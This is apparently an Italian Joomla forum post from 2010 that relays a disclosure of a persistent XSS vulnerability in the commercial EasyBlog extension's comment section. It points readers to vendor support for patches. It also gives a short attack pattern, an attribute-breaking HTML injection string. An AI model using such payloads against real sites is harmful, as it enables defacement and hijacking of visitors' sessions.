Joomla.it Forum

Non solo Joomla... => Sicurezza => : vamba 16 Jul 2010, 14:50:28

: Joomla EasyBlog Persistent XSS Vulnerability
: vamba 16 Jul 2010, 14:50:28

Estensione Commerciale
Per aggiornamenti e patch fate riferimento al supporto

Critical Level  : HIGH
URL :http://stackideas.com/products/easyblog.html

:

This vulnerability exists in the comments section.
 
1. Goto any post and submit your evil xss script in the comment section :P
 
Attack Pattern:">><marquee><h1>XSS3d by Sid3^effects</h1><marquee>